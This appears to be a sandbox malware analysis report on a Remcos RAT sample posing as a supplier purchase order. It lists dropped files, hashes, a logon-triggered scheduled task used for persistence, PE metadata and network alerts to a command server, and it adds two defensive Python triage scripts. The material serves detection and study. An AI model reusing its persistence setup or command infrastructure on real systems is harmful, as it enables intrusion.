                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                  Process:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):957
                                  Entropy (8bit):5.007722524309047
                                  Encrypted:false
                                  SSDEEP:24:qBdbauKyGX85jHf3SvXhNlT3/7YvfbYro:c00GX85mvhjTkvfEro
                                  MD5:FBEA5B5A68B9A87E64FA671D66B22262
                                  SHA1:C37C883F0D028E994BF84ABD9E3D5FD8ACEE546F
                                  SHA-256:339C6AD035A271525DAF53C417BB348B2288794820E87BF40EA297B6E09CA28B
                                  SHA-512:CAFB3022194324DD4D9F47AB7469AF2B5108123B5E4710A1EB464F94C34FAFD75ACC49BE43D239085DFCA3648371B621911FF7E096A926A9D73DB1AD136356BA
                                  Malicious:false
                                  Preview:{. "geoplugin_request":"173.254.250.71",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2232
                                  Entropy (8bit):5.379401388151058
                                  Encrypted:false
                                  SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugePu/ZPUyus:fLHxvIIwLgZ2KRHWLOugYs
                                  MD5:B01D320A5E00F6F44E3AD8CA06E3CD8C
                                  SHA1:5240EE0491CBB780ABEA523AC3A0B6434A6A4E6D
                                  SHA-256:4D3A7366CCBA6FFEA6A0B01F2609F414390C0A7768F348BFE658F0BE477500BB
                                  SHA-512:9BBED844058A91A68935D7A29CD111537E8A28B5FCE31984929A330100E09156E664410DB1C9E361D3C045A11BC7171C001466455F7BB57C1EF7E1E70E79B918
                                  Malicious:false
                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
(The same AppLocker probe file, with identical size, hashes and dropping process C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, is listed three more times in the original report; the repeated entries are collapsed here.)
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:dropped
                                  Size (bytes):1583
                                  Entropy (8bit):5.1019317197798975
                                  Encrypted:false
                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtX5xvn:cgergYrFdOFzOzN33ODOiDdKrsuTXvv
                                  MD5:6EE00B242E731319B5111D3614356649
                                  SHA1:D2CDEA54DF72A65D33DD7111DBD2EA5012945790
                                  SHA-256:1B8F48DF5D5DF43AFCDF45B929A3B2BE8D97A2051A2940C52516E6AA1372FC9A
                                  SHA-512:2527FE3A57CB09548663ECAB3BC7639C82C0637E76E9D9C7CFA4A70E0F6C3FCD2C1C1FCD09AD6092EA5180997A9DACB714C14D1FAB9F290BBE250FD6F3BD7D40
                                  Malicious:true
                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                  Process:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:dropped
                                  Size (bytes):1583
                                  Entropy (8bit):5.1019317197798975
                                  Encrypted:false
                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtX5xvn:cgergYrFdOFzOzN33ODOiDdKrsuTXvv
                                  MD5:6EE00B242E731319B5111D3614356649
                                  SHA1:D2CDEA54DF72A65D33DD7111DBD2EA5012945790
                                  SHA-256:1B8F48DF5D5DF43AFCDF45B929A3B2BE8D97A2051A2940C52516E6AA1372FC9A
                                  SHA-512:2527FE3A57CB09548663ECAB3BC7639C82C0637E76E9D9C7CFA4A70E0F6C3FCD2C1C1FCD09AD6092EA5180997A9DACB714C14D1FAB9F290BBE250FD6F3BD7D40
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
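Added example, not part of the Joe Sandbox report: a Python parser for the Task Scheduler XML that both the sample and its AppData copy drop (the two entries above). The report's preview is cut off before the Actions element, so the XML below is constructed: it reproduces the fields that are visible (LogonTrigger, LeastPrivilege principal, a UTF-16 declaration on plain ASCII bytes) and takes the action command as a caller-supplied assumption; hypothetical_payload.exe is a placeholder path, not a name from this report. The check flags the persistence pattern behind the dropped task: fire at every logon and run a binary from a user-writable directory.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories an unprivileged user can write to. Assumption: a logon-triggered
# task whose action lives in one of these is the user-level persistence pattern.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")


def build_task_xml(command: str, logon_enabled: bool = True) -> bytes:
    """Constructed sample mirroring the fields visible in the report's dropped
    task XML. <Actions> is truncated in the report, so the command is an
    assumption supplied by the caller, not data from the page."""
    enabled = "true" if logon_enabled else "false"
    text = f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>user-PC\\user</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>{enabled}</Enabled><UserId>user-PC\\user</UserId></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy></Settings>
  <Actions Context="Author">
    <Exec><Command>{command}</Command></Exec>
  </Actions>
</Task>"""
    # Like the dropped file: declares UTF-16, is actually written as ASCII.
    return text.encode("ascii")


def _to_text(raw: bytes) -> str:
    """Trust the bytes (BOM) over the declaration, then strip the declaration
    so the parser does not re-interpret the encoding from it."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8", errors="replace")
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1)


def analyse_task(raw: bytes) -> dict:
    """Extract the trigger, principal and action of a Task Scheduler XML and
    flag the logon-trigger + user-writable-path persistence pattern."""
    root = ET.fromstring(_to_text(raw))

    def txt(path: str) -> str:
        node = root.find(path, TASK_NS)
        return (node.text or "").strip() if node is not None else ""

    command = txt("t:Actions/t:Exec/t:Command")
    logon = txt("t:Triggers/t:LogonTrigger/t:Enabled").lower() == "true"
    user_writable = any(m in command.lower() for m in USER_WRITABLE_MARKERS)
    return {
        "author": txt("t:RegistrationInfo/t:Author"),
        "run_level": txt("t:Principals/t:Principal/t:RunLevel"),
        "logon_trigger": logon,
        "command": command,
        "user_writable_path": user_writable,
        "suspicious": logon and user_writable,
    }


if __name__ == "__main__":
    # Hypothetical path standing in for the truncated action in the report.
    sample = build_task_xml(r"C:\Users\user\AppData\Roaming\hypothetical_payload.exe")
    for key, value in analyse_task(sample).items():
        print(f"{key}: {value}")
```

The same function applies unchanged to task XML exported with `schtasks /Query /XML` from a live host, which is where the truncated Actions element would be recovered in practice.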
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):1025024
                                  Entropy (8bit):7.773297179915313
                                  Encrypted:false
                                  SSDEEP:24576:YLzHqFPLa+P2a13EfOUS2lQfMP+W8sQelk4vOG2ETh:6Lq9r+WPUSSWMGxwlib+
                                  MD5:9FE3811C49214479C36A4F4A35E9CA08
                                  SHA1:EDDBDE04B9751295E209ADDC60DE427C07B4CF1E
                                  SHA-256:3A15B2DF43B3665B869280969ADAEC6FC18DE92F2DA83E1D0228D7379FD55E09
                                  SHA-512:18A78507D0EC43DA2A68F5FA11B15C2AF877B5096F7375D3B4075AE0F269E3205B6C1BEADD16216A4523A43506D0962EFB8A962449F3906E9E547C825456D1E1
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 74%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{l...............0.................. ........@.. ....................................@.................................7...O....................................{..p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................k.......H......................hU...&...........................................0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*Z..}......}.....(.....*....0............{.....+..*&...}....*...0............{.....+..*&...}....*j.s....}......}.....(.....*....0............{.....+..*&...}....*...0............{.....+..*&...}....*".(.....*..0............{.....+..*&...}....*...0............{.....+..*
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.773297179915313
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:Supplier Purchase Order - PO0002491.exe
                                  File size:1'025'024 bytes
                                  MD5:9fe3811c49214479c36a4f4a35e9ca08
                                  SHA1:eddbde04b9751295e209addc60de427c07b4cf1e
                                  SHA256:3a15b2df43b3665b869280969adaec6fc18de92f2da83e1d0228d7379fd55e09
                                  SHA512:18a78507d0ec43da2a68f5fa11b15c2af877b5096f7375d3b4075ae0f269e3205b6c1beadd16216a4523a43506d0962efb8a962449f3906e9e547c825456d1e1
                                  SSDEEP:24576:YLzHqFPLa+P2a13EfOUS2lQfMP+W8sQelk4vOG2ETh:6Lq9r+WPUSSWMGxwlib+
                                  TLSH:4025F10017B9DA02E2B75BF808B1E7F447B56E99A831C30A8EE9BDEB3D327445550793
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{l...............0.................. ........@.. ....................................@................................
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x4fb88a
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0xB86C7B99 [Wed Jan 18 13:01:13 2068 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(followed by 97 x "add byte ptr [eax], al": the zero bytes after the six-byte entry stub, disassembled as instructions; 0x402000 is the single IAT slot (IMAGE_DIRECTORY_ENTRY_IAT, RVA 0x2000, size 0x8) through which the stub jumps to mscoree.dll!_CorExeMain)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfb837 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfc000 | 0x584 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf7bf8 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xf9890 | 0xf9a00 | aabcb7ae3f7f1eff9e4e9fccc5a24999 | False | 0.9053707514396595 | data | 7.778713534955087 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xfc000 | 0x584 | 0x600 | aa8721832339cbe9fdc81d2e5edced1c | False | 0.4153645833333333 | data | 4.015798294002136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfe000 | 0xc | 0x200 | 26ec026e60d2dd19d9aaa3fe16ec972f | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xfc090 | 0x2f4 | data | | | 0.44047619047619047
RT_MANIFEST | 0xfc394 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
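Added example, not part of the Joe Sandbox report: a Python triage script that re-derives three of the static findings above from the values the report prints, so they can be checked independently of the sandbox. It decodes the 0xB86C7B99 TimeDateStamp and compares it with the analysis date, recomputes the Import Hash from the single mscoree.dll!_CorExeMain import using the pefile imphash algorithm, and applies a Shannon-entropy check to the section table. Only the standard library is used. The 7.2 entropy cut-off is an assumption from common triage practice, and the 2024-10-24 analysis date is taken from the network timestamps in this report.

```python
import hashlib
import math
from datetime import datetime, timezone

# Values copied from the static PE summary in this report.
REPORT_TIMESTAMP = 0xB86C7B99
REPORT_IMPHASH = "f34d5f2d4577ed6d9ceec516c1f5a744"
REPORT_IMPORTS = {"mscoree.dll": ["_CorExeMain"]}
REPORT_SECTIONS = [  # (name, entropy, characteristics) as printed above
    (".text", 7.778713534955087, "IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ"),
    (".rsrc", 4.015798294002136, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    (".reloc", 0.10191042566270775, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ"),
]
# Assumption: analysis date taken from the network timestamps in this report.
ANALYSIS_DATE = datetime(2024, 10, 24, tzinfo=timezone.utc)
# Assumption: common triage cut-off for a packed or encrypted executable section.
HIGH_ENTROPY = 7.2


def decode_pe_timestamp(ts: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since 1970-01-01 UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def timestamp_is_suspicious(ts: int, analysed_at: datetime) -> bool:
    """A link time later than the analysis date cannot be genuine; a value
    before 1990 is equally bogus for a Windows PE."""
    linked = decode_pe_timestamp(ts)
    return linked > analysed_at or linked.year < 1990


def imphash(imports: dict[str, list[str]]) -> str:
    """Import hash as pefile computes it: 'dll.func' pairs lower-cased, the
    DLL extension (.dll/.ocx/.sys) dropped, comma-joined, MD5-hashed.
    Ordinal imports are not handled in this cut-down version."""
    parts = []
    for dll, funcs in imports.items():
        lib = dll.lower()
        base, _, ext = lib.rpartition(".")
        if ext in ("dll", "ocx", "sys") and base:
            lib = base
        parts.extend(f"{lib}.{f.lower()}" for f in funcs)
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def section_is_suspicious(entropy: float, characteristics: str) -> bool:
    """Executable code that is nearly incompressible points to a packer stub
    wrapping an encrypted payload rather than ordinary compiled code."""
    return "IMAGE_SCN_MEM_EXECUTE" in characteristics and entropy >= HIGH_ENTROPY


def triage_report() -> dict:
    """Apply the three checks to the values printed in this report."""
    return {
        "link_time_utc": decode_pe_timestamp(REPORT_TIMESTAMP).strftime("%Y-%m-%d %H:%M:%S"),
        "timestamp_suspicious": timestamp_is_suspicious(REPORT_TIMESTAMP, ANALYSIS_DATE),
        "imphash_matches_report": imphash(REPORT_IMPORTS) == REPORT_IMPHASH,
        "high_entropy_code_sections": [
            name for name, ent, chars in REPORT_SECTIONS if section_is_suspicious(ent, chars)
        ],
    }


if __name__ == "__main__":
    for key, value in triage_report().items():
        print(f"{key}: {value}")
```

The imphash check is a reminder of how little that value is worth for .NET samples: every managed executable imports only mscoree.dll!_CorExeMain, so they all share the same hash and it cannot be used to cluster this sample with anything.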
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T12:58:12.110788+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49708 | 192.210.150.14 | 2404 | TCP
2024-10-24T12:58:12.784600+0200 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 192.210.150.14 | 2404 | 192.168.2.5 | 49708 | TCP
2024-10-24T12:58:14.440169+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49710 | 178.237.33.50 | 80 | TCP
2024-10-24T13:00:16.623458+0200 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 192.210.150.14 | 2404 | 192.168.2.5 | 49708 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 12:58:12.104074001 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:58:12.109636068 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:12.109723091 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:58:12.110788107 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:58:12.116157055 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:12.784600019 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:12.797528982 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:58:12.803288937 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:13.025482893 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:13.075388908 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:58:13.585968971 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 12:58:13.591753960 CEST | 80 | 49710 | 178.237.33.50 | 192.168.2.5
Oct 24, 2024 12:58:13.591962099 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 12:58:13.592226028 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 12:58:13.597706079 CEST | 80 | 49710 | 178.237.33.50 | 192.168.2.5
Oct 24, 2024 12:58:14.440066099 CEST | 80 | 49710 | 178.237.33.50 | 192.168.2.5
Oct 24, 2024 12:58:14.440169096 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 12:58:14.451651096 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:58:14.457564116 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:15.555850029 CEST | 80 | 49710 | 178.237.33.50 | 192.168.2.5
Oct 24, 2024 12:58:15.555922031 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 12:58:16.471971989 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:16.474471092 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:58:16.479808092 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:46.516985893 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:58:46.518624067 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:58:46.524187088 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:59:16.580583096 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:59:16.587809086 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:59:16.593157053 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:59:46.607960939 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 12:59:46.612632990 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 12:59:46.618012905 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 13:00:03.534708023 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
